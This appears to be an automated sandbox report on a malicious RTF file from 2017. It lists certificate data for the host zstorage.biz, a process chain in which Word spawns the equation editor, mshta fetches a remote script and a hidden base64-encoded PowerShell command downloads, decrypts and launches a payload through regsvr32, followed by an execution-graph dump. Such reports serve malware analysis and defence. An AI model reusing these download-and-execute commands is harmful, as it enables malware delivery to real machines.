]._3.M..8./.,b..00B0: A3 91 6F 25 1B 2F 90 B1 19 46 3D F6 7E 1B A6 7A ..o%./...F=....z00C0: 87 B9 A3 7A 6D 18 FA 25 A5 91 87 15 E0 F2 16 2F ...zm..%......./00D0: 58 B0 06 2F 2C 68 26 C6 4B 98 CD DA 9F 0C F9 7F X../,h&.K.......00E0: 90 ED 43 4A 12 44 4E 6F 73 7A 28 EA A4 AA 6E 7B ..CJ.DNosz(...n.00F0: 4C 7D 87 DD E0 C9 02 44 A7 87 AF C3 34 5B B4 42 L......D....4[.B]
Nov 21, 2017 22:22:10.869261980 MEZ44349168185.82.23.166192.168.2.2CN=zstorage.bizCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USThu Oct 26 12:23:36 CEST 2017Wed Jan 24 11:23:36 CET 2018[[ Version: V3 Subject: CN=zstorage.biz Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 23560700598155367255315356602121003432706908288835855806175453142275684183727732665375861115460690686442629520255232730871945167149619588096888963659462152088362214534919479611432975068412248966013428653289800435820351547288949606255968682109922484026520660436163269540296092501689321875992312273456192201077009298817132640269315981044667471396071902116147788500314408855792891315166831693364633710099928935493927017174929650643689955650638558279959550008506883415245120150494950552896989622659621453579338794750003618704914413330474880241269693199713330959838743202638447520620106470949347210404964688977630602115739 public exponent: 65537 Validity: [From: Thu Oct 26 12:23:36 CEST 2017, To: Wed Jan 24 11:23:36 CET 2018] Issuer: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US SerialNumber: [ 038ee404 e483a226 3ec278aa 38ce735a 8fd9]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.int-x3.letsencrypt.org, accessMethod: caIssuers accessLocation: URIName: http://cert.int-x3.letsencrypt.org/]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1A 68 74 74 70 3A 2F 2F 63 70 73 2E 6C 65 74 ..http://cps.let0010: 73 65 6E 63 72 79 70 74 2E 6F 72 67 sencrypt.org], PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.2 qualifier: 0000: 30 81 9E 0C 81 9B 54 68 69 73 20 43 65 72 74 69 0.....This Certi0010: 66 69 63 61 74 65 20 6D 61 79 20 6F 6E 6C 79 20 ficate may only 0020: 62 65 20 72 65 6C 69 65 64 20 75 70 6F 6E 20 62 be relied upon b0030: 79 20 52 65 6C 79 69 6E 67 20 50 61 72 74 69 65 y Relying Partie0040: 73 20 61 6E 64 20 6F 6E 6C 79 20 69 6E 20 61 63 s and only in ac0050: 63 6F 72 64 61 6E 63 65 20 77 69 74 68 20 74 68 cordance with th0060: 65 20 43 65 72 74 69 66 69 63 61 74 65 20 50 6F e Certificate Po0070: 6C 69 63 79 20 66 6F 75 6E 64 20 61 74 20 68 74 licy found at ht0080: 74 70 73 3A 2F 2F 6C 65 74 73 65 6E 63 72 79 70 tps://letsencryp0090: 74 2E 6F 72 67 2F 72 65 70 6F 73 69 74 6F 72 79 t.org/repository00A0: 2F /]] ]][5]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][7]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: zstorage.biz][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E5 E8 D0 AA 71 13 06 D3 EA 3B D0 8C 02 93 73 A7 ....q....;....s.0010: 7E F3 87 9B ....]]] Algorithm: [SHA256withRSA] Signature:0000: 38 71 C9 B8 56 2B F3 B4 47 C2 6B 8A 3D 1E D8 67 8q..V+..G.k.=..g0010: F4 12 90 1F 05 F6 92 94 F7 1C 8E B8 50 C9 2D 88 ............P.-.0020: 78 4F C9 F3 44 C6 5D AB 0C B1 E4 24 31 1C 54 1E xO..D.]....$1.T.0030: FF 4A 63 8A 1C 1C F6 89 10 6C 03 C0 FA E4 84 57 .Jc......l.....W0040: 0A 52 64 93 15 88 F3 36 07 95 D0 D8 01 59 F4 A0 .Rd....6.....Y..0050: 61 4C 45 E7 8B 57 60 31 55 8A CC DF 6F 8F 1D 94 aLE..W`1U...o...0060: B6 18 CF 64 94 F7 F1 BB 1F 0E 87 3B 6B 0F AF 4D ...d.......;k..M0070: D1 AE 34 B6 B3 9B 5D B1 25 0C EE F5 F6 A0 1A F4 ..4...].%.......0080: AA F2 7B 26 BC 9C 35 AF 0D 50 BE E7 AC C6 F6 F6 ...&..5..P......0090: 9D 81 15 C8 ED 2B 6E F1 7E 25 DB 2F 69 A4 4F B3 .....+n..%./i.O.00A0: 4D 29 48 65 B2 57 41 BD B6 9E F9 6D C1 6A 7F 87 M)He.WA....m.j..00B0: EC A0 0A 85 32 28 0B CB EF 89 30 4C 5C 94 76 F7 ....2(....0L\.v.00C0: 10 BD 58 A6 07 CE 5C BE 04 CA 87 41 D5 C4 57 F1 ..X...\....A..W.00D0: 8F 4E 4F 54 08 6A 55 7E 8E 76 E5 28 77 3A D2 01 .NOT.jU..v.(w:..00E0: E1 94 9C ED 7B 42 8D 13 B4 8D BB 23 6C B2 F1 0F .....B.....#l...00F0: 0B CD B3 17 F2 0E 08 D9 4F 94 C4 A7 92 B9 24 B1 ........O.....$.]
Nov 21, 2017 22:22:10.869261980 MEZ44349168185.82.23.166192.168.2.2CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021[[ Version: V3 Subject: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19797248476075437682355852246492227182925025209894527646389863306257272162327717438476096960751529894413137923782807258828237626757946953550223743258656059351948211427799114263948499232121738590221774214131983890556391436336270214266656447169277800971416884432628642288505627878176138101439755752196484972290641499489076846352390454201028735981960275647482014359370041238010607728611828345534572152635280172155598035959878659370929022966413402097129857505568509453268467065766156311136296802046438183697980908977865999500405760226706893415483460747503705792669060406182022181441316967415301631965711690685520847684499 public exponent: 65537 Validity: [From: Thu Mar 17 17:40:46 CET 2016, To: Wed Mar 17 17:40:46 CET 2021] Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co. SerialNumber: [ 0a014142 00000153 85736a0b 85eca708]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://isrg.trustid.ocsp.identrust.com, accessMethod: caIssuers accessLocation: URIName: http://apps.identrust.com/roots/dstrootcax3.p7c]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C4 A7 B1 A4 7B 2C 71 FA DB E1 4B 90 75 FF C4 15 .....,q...K.u...0010: 60 85 89 10 `...]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.identrust.com/DSTROOTCAX3CRL.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 22 68 74 74 70 3A 2F 2F 63 70 73 2E 72 6F 6F ."http://cps.roo0010: 74 2D 78 31 2E 6C 65 74 73 65 6E 63 72 79 70 74 t-x1.letsencrypt0020: 2E 6F 72 67 .org]] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]]] Algorithm: [SHA256withRSA] Signature:0000: DD 33 D7 11 F3 63 58 38 DD 18 15 FB 09 55 BE 76 .3...cX8.....U.v0010: 56 B9 70 48 A5 69 47 27 7B C2 24 08 92 F1 5A 1F V.pH.iG'..$...Z.0020: 4A 12 29 37 24 74 51 1C 62 68 B8 CD 95 70 67 E5 J.)7$tQ.bh...pg.0030: F7 A4 BC 4E 28 51 CD 9B E8 AE 87 9D EA D8 BA 5A ...N(Q.........Z0040: A1 01 9A DC F0 DD 6A 1D 6A D8 3E 57 23 9E A6 1E ......j.j.>W#...0050: 04 62 9A FF D7 05 CA B7 1F 3F C0 0A 48 BC 94 B0 .b.......?..H...0060: B6 65 62 E0 C1 54 E5 A3 2A AD 20 C4 E9 E6 BB DC .eb..T..*. .....0070: C8 F6 B5 C3 32 A3 98 CC 77 A8 E6 79 65 07 2B CB ....2...w..ye.+.0080: 28 FE 3A 16 52 81 CE 52 0C 2E 5F 83 E8 D5 06 33 (.:.R..R.._....30090: FB 77 6C CE 40 EA 32 9E 1F 92 5C 41 C1 74 6C 5B .wl.@.2...\A.tl[00A0: 5D 0A 5F 33 CC 4D 9F AC 38 F0 2F 7B 2C 62 9D D9 ]._3.M..8./.,b..00B0: A3 91 6F 25 1B 2F 90 B1 19 46 3D F6 7E 1B A6 7A ..o%./...F=....z00C0: 87 B9 A3 7A 6D 18 FA 25 A5 91 87 15 E0 F2 16 2F ...zm..%......./00D0: 58 B0 06 2F 2C 68 26 C6 4B 98 CD DA 9F 0C F9 7F X../,h&.K.......00E0: 90 ED 43 4A 12 44 4E 6F 73 7A 28 EA A4 AA 6E 7B ..CJ.DNosz(...n.00F0: 4C 7D 87 DD E0 C9 02 44 A7 87 AF C3 34 5B B4 42 L......D....4[.B]

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:22:21:13
Start date:21/11/2017
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\5ZFXLxew8B.rtf
Imagebase:0x66580000
File size:1423008 bytes
MD5 hash:5D798FF0BE2A8970D932568068ACFD9D
Programmed in:C, C++ or other language
Reputation:low

General

Start time:22:21:15
Start date:21/11/2017
Path:C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:0x6fb00000
File size:543304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Programmed in:C, C++ or other language
Reputation:low

General

Start time:22:21:15
Start date:21/11/2017
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:mshta https://zstorage.biz/read.txt & XXXXXX C
Imagebase:0x753b0000
File size:13312 bytes
MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Programmed in:C, C++ or other language
Reputation:low

General

Start time:22:21:59
Start date:21/11/2017
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWgBlAHIAbwBzADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4ADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4ASQBWACAAPQAgACQAbgBnAEMAbQBJAHcAWQBbADAALgAuADEANQBdADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEsAZQB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAE0AVABZADUAUgBqAEoARwBNAEQAZABGAFEAVQBSAEcAUgBEAFUAegBNAEQASQB3AE4AagBKAEMATQBFAFkAMQBSAGsAVQAxAE0AMABKAEMATgB6AFEAPQAnACkAOwAkAHcANgBxAFoAVwBTAGYAZgAgAD0AIAAkAGoAMQBaAFMASwBWAEUARAAzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApADsAJABnAHEAQQAgAD0AIAAkAHcANgBxAFoAVwBTAGYAZgAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAG4AZwBDAG0ASQB3AFkALAAgADEANgAsACAAJABuAGcAQwBtAEkAdwBZAC4ATABlAG4AZwB0AGgAIAAtACAAMQA2ACkAOwAkAHMAbAAgAD0AKABbAGMAaABhAHIAXQA5ADIAKQA7ACQAZgBmACAAPQAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACAAKwAgACQAcwBsACAAKwAgAC0AagBvAGkAbgAgACgAKAA2ADUALgAuADkAMAApACAAKwAgACgAOQA3AC4ALgAxADIAMgApACAAfAAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEMAbwB1AG4AdAAgADEAMAAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApACAAKwAgACcALgB0AHgAdAAnADsAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAGYAZgAsACAAJABnAHEAQQApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBmACkAIAB7ACQAbQBpACAAPQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAgACsAIAAkAHMAbAA7ACQAZQAyACAAPQAgACcAcgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAJwA7AGkAZgAgACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADQAKQAgAHsAIAAkAG0AaQAgAD0AIAAkAG0AaQAgACsAIAAnAFMAeQBzAHQAZQBtADMAMgAnACAAKwAgACQAcwBsACAAKwAgACQAZQAyADsAfQAgAGUAbABzAGUAIAB7ACAAJABtAGkAIAA9ACAAJABtAGkAIAArACAAJwBTAHkAcwBXAE8AVwA2ADQAJwAgACsAIAAkAHMAbAAgACsAIAAkAGUAMgA7AH0AJAB4ADAAPQAoAFsAYwBoAGEAcgBdADMANAApADsAJABhAHIAZwAxACAAPQAgACcALwBzACAAJwAgACsAIAAkAHgAMAAgACsAIAAkAGYAZgAgACsAIAAkAHgAMAA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAkAG0AaQAgACQAYQByAGcAMQA7AH0A'
Imagebase:0x755c0000
File size:452608 bytes
MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
Programmed in:.Net C# or VB.NET
Reputation:low

General

Start time:22:22:03
Start date:21/11/2017
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' /s 'C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt'
Imagebase:0x774a0000
File size:14848 bytes
MD5 hash:432BE6CF7311062633459EEF6B242FB5
Programmed in:C, C++ or other language
Reputation:low

General

Start time:22:23:27
Start date:21/11/2017
Path:C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe
Wow64 process (32bit):
Commandline:unknown
Imagebase:
File size:24896 bytes
MD5 hash:3E9F31B4E2CD423C015D34D63047685E
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis

Reset < >

    Execution Graph

    Execution Coverage:9.5%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:0.1%
    Total number of Nodes:2000
    Total number of Limit Nodes:42

    Graph

    execution_graph 6505 10001000 6506 10001015 6505->6506 6507 10001007 6505->6507 6509 10001033 6506->6509 6530 100010f7 6506->6530 6511 10001042 HeapCreate 6507->6511 6535 1000aeb0 HeapCreate HeapAlloc 6511->6535 6513 10001060 6536 100091ce 6513->6536 6517 1000106f 6542 1000ab28 6517->6542 6521 100010b2 6522 10007008 4 API calls 6521->6522 6523 100010c3 6522->6523 6524 10007008 4 API calls 6523->6524 6525 100010d4 6524->6525 6526 10007008 4 API calls 6525->6526 6527 100010e5 6526->6527 6528 10007008 4 API calls 6527->6528 6529 100010f6 6528->6529 6529->6506 6576 1000110d 6530->6576 6534 10001101 HeapDestroy 6534->6509 6535->6513 6552 1000a9cf HeapAlloc HeapAlloc 6536->6552 6538 100091dc 6553 1000a917 HeapAlloc 6538->6553 6540 1000106a 6541 10008040 HeapCreate 6540->6541 6541->6517 6555 1000acd3 6542->6555 6545 1000ab45 HeapAlloc 6547 1000ab64 memset 6545->6547 6548 1000aba8 6545->6548 6546 1000108d 6549 10007008 6546->6549 6547->6548 6548->6546 6569 1000b090 6549->6569 6551 1000700f 6551->6521 6552->6538 6554 1000a933 6553->6554 6554->6540 6556 1000ab39 6555->6556 6560 1000acdc 6555->6560 6556->6545 6556->6546 6557 1000ad07 HeapFree 6557->6556 6558 1000ad05 6558->6557 6560->6557 6560->6558 6561 10012c67 6560->6561 6562 10012d62 6561->6562 6563 10012c7f 6561->6563 6562->6560 6563->6562 6565 10012c67 HeapFree 6563->6565 6566 1000af30 6563->6566 6565->6563 6567 1000af3b HeapFree 6566->6567 6568 1000af4e 6566->6568 6567->6568 6568->6563 6570 1000b0a1 wcslen 6569->6570 6571 1000b10d 6569->6571 6572 1000b0d6 HeapReAlloc 6570->6572 6573 1000b0b8 HeapAlloc 6570->6573 6574 1000b115 HeapFree 6571->6574 6575 1000b0f8 6571->6575 6572->6575 6573->6575 6574->6575 6575->6551 6577 10001112 6576->6577 6581 10008030 HeapDestroy 6577->6581 6579 100010fc 6580 1000af00 HeapFree HeapDestroy 6579->6580 6580->6534 6581->6579 9438 10004bc1 9439 10004bc3 9438->9439 9440 1000af30 HeapFree 9439->9440 9441 10004bcc 9440->9441 9442 1000af30 HeapFree 9441->9442 9443 10004bd5 9442->9443 9444 1000af30 HeapFree 9443->9444 9445 10004bde 9444->9445 9446 1000af30 HeapFree 9445->9446 9447 10004be7 9446->9447 9448 1000af30 HeapFree 9447->9448 9449 10004bf0 9448->9449 9450 1000af30 HeapFree 9449->9450 9451 10004bf9 9450->9451 9452 1000af30 HeapFree 9451->9452 9453 10004c01 9452->9453 9454 1000af30 HeapFree 9453->9454 9455 10004c0a 9454->9455 9456 1000af30 HeapFree 9455->9456 9457 10004c13 9456->9457 9458 1000af30 HeapFree 9457->9458 9459 10004c1c 9458->9459 9460 1000af30 HeapFree 9459->9460 9461 10004c25 9460->9461 9462 1000af30 HeapFree 9461->9462 9463 10004c2e 9462->9463 8713 10002fc9 8714 10007000 2 API calls 8713->8714 8715 10002fd9 8714->8715 8716 10002fe2 RegQueryValueExW 8715->8716 8717 1000300b 8715->8717 8716->8717 8718 1000af30 HeapFree 8717->8718 8719 10003015 8718->8719 6582 10003969 6583 10003974 6582->6583 6584 10003979 6582->6584 6586 10004e45 6583->6586 6607 100038b3 6586->6607 6589 10007008 4 API calls 6590 10004e5c 6589->6590 6591 10007008 4 API calls 6590->6591 6592 10004e6d 6591->6592 6593 10007008 4 API calls 6592->6593 6594 10004e7e 6593->6594 6595 10004e8d 6594->6595 6875 1000556e 6594->6875 6600 10004e93 6595->6600 6620 100030e3 6595->6620 6600->6584 6601 10004eaf 6601->6600 6646 100050a2 6601->6646 6612 100038b7 6607->6612 6609 1000392f 6611 10007008 4 API calls 6609->6611 6613 10003940 6611->6613 6612->6609 6988 10004f02 6612->6988 7007 1000afe0 6612->7007 7011 100074c0 6612->7011 7019 1000af60 6612->7019 6615 10007008 4 API calls 6613->6615 6616 10003951 6615->6616 6617 10007008 4 API calls 6616->6617 6619 10003962 6617->6619 6619->6589 7038 100054c5 6620->7038 6623 1000af60 2 API calls 6624 10003102 6623->6624 7051 10007680 6624->7051 6626 1000311c 6627 10004f02 7 API calls 6626->6627 6628 1000313b 6627->6628 6629 10003172 6628->6629 6630 10003156 6628->6630 6631 100054c5 8 API calls 6629->6631 6632 10007008 4 API calls 6630->6632 6633 1000318e 6631->6633 6634 10003165 6632->6634 7055 100084ad 6633->7055 6636 1000af30 HeapFree 6634->6636 6638 10003205 6636->6638 6640 1000af30 HeapFree 6638->6640 6639 1000af60 2 API calls 6642 100031a6 6639->6642 6641 1000320d 6640->6641 6641->6600 6641->6601 6935 100024f3 6641->6935 6642->6634 6643 10004f02 7 API calls 6642->6643 6644 100031cd 6643->6644 6644->6634 6645 10007008 4 API calls 6644->6645 6645->6634 6647 10004f02 7 API calls 6646->6647 6648 100050c1 6647->6648 6649 1000af60 2 API calls 6648->6649 6650 100050cb 6649->6650 6651 10004f02 7 API calls 6650->6651 6652 100050e9 6651->6652 7073 10002bb7 6652->7073 6655 1000af60 2 API calls 6656 10005101 6655->6656 7094 1000301b 6656->7094 6659 1000525b 7170 10006c26 6659->7170 6660 1000511e 6661 10004f02 7 API calls 6660->6661 6664 1000513c 6661->6664 6666 10004f02 7 API calls 6664->6666 6665 1000af60 2 API calls 6674 1000527e 6665->6674 6667 1000515b 6666->6667 6668 1000301b 12 API calls 6667->6668 6669 10005181 6668->6669 6671 1000519b 6669->6671 7109 1000137f 6669->7109 7118 100035d1 6671->7118 6672 10007008 4 API calls 6673 10005381 6672->6673 6676 10007008 4 API calls 6673->6676 6678 100035d1 13 API calls 6674->6678 6733 10005256 6674->6733 6685 10005390 6676->6685 6680 100052e6 6678->6680 6679 1000afe0 2 API calls 6681 100051d5 6679->6681 6682 1000afe0 2 API calls 6680->6682 6683 100035d1 13 API calls 6681->6683 6686 100052f2 6682->6686 6688 100051e4 6683->6688 6684 100054a4 6687 1000af30 HeapFree 6684->6687 6685->6684 7206 10007ac0 6685->7206 6690 100035d1 13 API calls 6686->6690 6691 100054af 6687->6691 6692 1000afe0 2 API calls 6688->6692 6695 10005301 6690->6695 6696 1000af30 HeapFree 6691->6696 6697 100051f1 6692->6697 6693 100053c9 6694 1000af60 2 API calls 6693->6694 6698 100053d5 6694->6698 6699 1000afe0 2 API calls 6695->6699 6700 100054b8 6696->6700 6704 100035d1 13 API calls 6697->6704 6701 10007ac0 4 API calls 6698->6701 6702 1000530e 6699->6702 6703 1000af30 HeapFree 6700->6703 6705 100053f5 6701->6705 6711 100035d1 13 API calls 6702->6711 6706 10004ecc 6703->6706 6707 1000520c 6704->6707 6708 10004f02 7 API calls 6705->6708 6740 10001a69 6706->6740 6709 1000afe0 2 API calls 6707->6709 6710 1000540d 6708->6710 6712 10005219 6709->6712 6713 1000af60 2 API calls 6710->6713 6714 10005329 6711->6714 6719 100035d1 13 API calls 6712->6719 6715 1000541a 6713->6715 6716 1000afe0 2 API calls 6714->6716 6717 10007ac0 4 API calls 6715->6717 6718 10005336 6716->6718 6720 1000543a 6717->6720 6723 100035d1 13 API calls 6718->6723 6721 10005234 6719->6721 6722 10004f02 7 API calls 6720->6722 6724 1000af60 2 API calls 6721->6724 6725 10005452 6722->6725 6726 10005351 6723->6726 6727 1000523f 6724->6727 6728 1000af60 2 API calls 6725->6728 6729 1000af60 2 API calls 6726->6729 7151 10002d71 6727->7151 6731 1000545f 6728->6731 6732 1000535c 6729->6732 6734 10007ac0 4 API calls 6731->6734 6735 10002d71 12 API calls 6732->6735 6733->6672 6736 1000547f 6734->6736 6735->6733 6737 10004f02 7 API calls 6736->6737 6738 10005497 6737->6738 6739 1000af60 2 API calls 6738->6739 6739->6684 6741 10001a6f 6740->6741 6741->6741 6742 10004f02 7 API calls 6741->6742 6743 10001a94 6742->6743 6744 1000af60 2 API calls 6743->6744 6745 10001a9e 6744->6745 6746 1000afe0 2 API calls 6745->6746 6747 10001ab4 6746->6747 6748 1000afe0 2 API calls 6747->6748 6749 10001ac0 6748->6749 6750 10002bb7 11 API calls 6749->6750 6751 10001ace 6750->6751 6752 1000af60 2 API calls 6751->6752 6753 10001ad8 6752->6753 6754 1000afe0 2 API calls 6753->6754 6755 10001aee 6754->6755 6756 1000afe0 2 API calls 6755->6756 6757 10001afa 6756->6757 6758 10002bb7 11 API calls 6757->6758 6759 10001b08 6758->6759 6760 1000af60 2 API calls 6759->6760 6761 10001b12 6760->6761 6762 10004f02 7 API calls 6761->6762 6763 10001b2a 6762->6763 6764 1000af60 2 API calls 6763->6764 6765 10001b34 6764->6765 6766 10004f02 7 API calls 6765->6766 6767 10001b4c 6766->6767 6768 1000af60 2 API calls 6767->6768 6769 10001b56 6768->6769 6770 1000afe0 2 API calls 6769->6770 6771 10001b68 6770->6771 6772 1000afe0 2 API calls 6771->6772 6773 10001b72 6772->6773 6774 1000afe0 2 API calls 6773->6774 6775 10001b7e 6774->6775 6776 1000afe0 2 API calls 6775->6776 6777 10001b88 6776->6777 6778 1000afe0 2 API calls 6777->6778 6779 10001b94 6778->6779 6780 1000af60 2 API calls 6779->6780 6781 10001ba0 6780->6781 7333 10002752 6781->7333 6784 10001f1e 6785 1000af30 HeapFree 6784->6785 6787 10001f29 6785->6787 6786 10007008 4 API calls 6788 10001bc3 6786->6788 6789 1000af30 HeapFree 6787->6789 6790 10004f02 7 API calls 6788->6790 6792 10001f31 6789->6792 6791 10001bdb 6790->6791 6793 1000afe0 2 API calls 6791->6793 6794 1000af30 HeapFree 6792->6794 6796 10001be7 6793->6796 6795 10001f3a 6794->6795 6797 1000af30 HeapFree 6795->6797 6798 1000afe0 2 API calls 6796->6798 6799 10001f43 6797->6799 6800 10001bf1 6798->6800 6801 1000af30 HeapFree 6799->6801 6802 1000afe0 2 API calls 6800->6802 6803 10001f4c 6801->6803 6804 10001bfd 6802->6804 6805 1000af30 HeapFree 6803->6805 6806 1000afe0 2 API calls 6804->6806 6807 10001f55 6805->6807 6808 10001c09 6806->6808 6953 10002219 6807->6953 6809 1000af60 2 API calls 6808->6809 6810 10001c15 6809->6810 6811 1000301b 12 API calls 6810->6811 6812 10001c28 6811->6812 6813 10001c54 6812->6813 6814 10001c2e 6812->6814 6815 10006c26 15 API calls 6813->6815 6816 10002d71 12 API calls 6814->6816 6820 10001c6d 6815->6820 6817 10001c47 6816->6817 6818 10001c52 6817->6818 7957 10004c35 6817->7957 6821 10007008 4 API calls 6818->6821 6820->6818 6822 10002d71 12 API calls 6820->6822 6823 10001ccd 6821->6823 6825 10001ca7 6822->6825 6824 10007008 4 API calls 6823->6824 6826 10001cde 6824->6826 6825->6818 6828 10004c35 20 API calls 6825->6828 6827 10007008 4 API calls 6826->6827 6829 10001cec 6827->6829 6828->6818 6830 10007008 4 API calls 6829->6830 6831 10001cfb 6830->6831 6832 1000afe0 2 API calls 6831->6832 6833 10001d17 6832->6833 6834 1000afe0 2 API calls 6833->6834 6835 10001d23 6834->6835 6836 10002bb7 11 API calls 6835->6836 6837 10001d31 6836->6837 7418 10003aa4 6837->7418 6840 10007008 4 API calls 6841 10001d61 6840->6841 7595 100042c8 6841->7595 6844 10007008 4 API calls 6847 10001d84 6844->6847 6845 10004f02 7 API calls 6845->6847 6846 10001df0 6848 1000afe0 2 API calls 6846->6848 6847->6845 6847->6846 6852 10003211 8 